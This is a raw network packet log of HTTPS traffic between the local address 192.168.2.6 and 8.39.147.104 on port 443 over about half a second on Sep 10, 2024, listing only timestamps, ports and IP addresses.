                                                                                Sep 10, 2024 16:33:41.313270092 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313285112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313343048 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.313357115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313994884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.314228058 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.314244032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.314300060 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.314306974 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.314399004 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.315028906 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.315047026 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.315097094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.315104961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.315308094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.317574024 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.317637920 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.317694902 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.317694902 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.317703009 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.317856073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.319566011 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.319607019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.319658041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.319664001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.319686890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.319699049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.321068048 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.321110010 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.321151018 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.321158886 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.321207047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.321207047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.322606087 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.322788954 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.350179911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.350220919 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.350263119 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.350276947 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.350322008 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.350322008 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405247927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405288935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405340910 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405359030 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405411005 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405445099 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405689955 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405735970 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405766964 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405772924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405800104 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405853033 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.407990932 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408035994 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408097982 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408104897 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408134937 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408489943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408570051 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408624887 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408678055 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408678055 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408685923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410370111 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.410625935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410671949 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410722017 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.410727024 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410748005 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.411003113 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.412223101 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.412265062 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.412321091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.412327051 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.412378073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.412378073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.413269043 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.413319111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.413377047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.413383007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.413440943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.413440943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.436636925 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.436697006 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.436783075 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.436783075 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.436795950 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.438951969 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494565964 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494626045 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494693041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494693041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494704008 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494776964 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494829893 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494844913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494844913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494872093 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494923115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494923115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496078968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496128082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496166945 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496171951 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496191978 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496191978 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496383905 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496613979 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496654987 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496690035 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496696949 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496707916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496834993 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.497961044 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498011112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498054028 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498066902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498105049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498105049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498436928 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498480082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498526096 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498532057 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498564959 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498564959 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.499954939 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.499998093 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.500030994 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.500037909 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.500183105 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.500184059 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.522850037 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.522905111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.522957087 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.522964001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.523019075 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.523211956 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.580698967 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.580734015 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.580816984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.580832005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581363916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.581660032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581726074 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581757069 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.581764936 CEST443497188.39.147.104192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 10, 2024 16:33:41.581809044 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.581840992 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.582154036 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.582200050 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.582242966 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.582248926 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.582262039 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.582715034 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.582762957 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.582843065 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.582843065 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.582850933 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.583971024 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.584007978 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.584038973 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.584045887 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.584090948 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.584129095 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.584511995 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.584547043 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.584583044 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.584589005 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.584626913 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.584626913 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.584953070 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.585944891 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.585982084 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.586025000 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.586031914 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.586081982 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.586119890 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.587838888 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.609204054 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.609263897 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.609361887 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.609361887 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.609380960 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.611054897 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.667272091 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.667346001 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.667409897 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.667427063 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.667439938 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.667496920 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.667762995 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.667807102 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.667843103 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.667850018 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.668135881 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.668252945 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.668951035 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.668996096 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.669042110 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.669049978 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.669075966 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.669238091 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.669572115 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.669620991 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.669647932 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.669653893 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.669699907 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.669699907 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.670747042 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.670793056 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.670859098 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.670859098 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.670866013 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.671066999 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.671273947 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.671315908 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.671349049 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.671355009 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.671377897 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.671406031 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.672687054 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.672739029 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.672789097 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.672796011 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.672808886 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.672846079 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.695080042 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.695130110 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.695188999 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.695202112 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.695218086 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.695322990 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.753273010 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.753326893 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.753405094 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.753405094 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.753417015 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.753493071 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.753806114 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.753851891 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.753906012 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.753906012 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.753912926 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.754184961 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.755152941 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.755196095 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.755266905 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.755266905 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.755279064 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.755323887 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.755731106 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.755779982 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.755840063 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.755840063 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.755846977 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.756412983 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.756717920 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.756759882 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.756822109 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.756822109 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.756828070 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.756947041 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.757492065 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.757534027 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.757584095 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.757591009 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.757603884 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.757745981 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.759079933 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.759121895 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.759191036 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.759191036 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.759196997 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.759295940 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.790910006 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.790982962 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.791078091 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.791078091 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.791095972 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.791402102 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.839544058 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.839612007 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.839653015 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.839672089 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.839680910 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.839778900 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.839831114 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.839895964 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.839895964 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.839904070 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.840574026 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.841034889 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.841077089 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.841137886 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.841137886 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.841145039 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.841355085 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.841382027 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.841434956 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.841463089 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.841471910 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.841490984 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.841634989 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.842571974 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.842590094 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.842672110 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
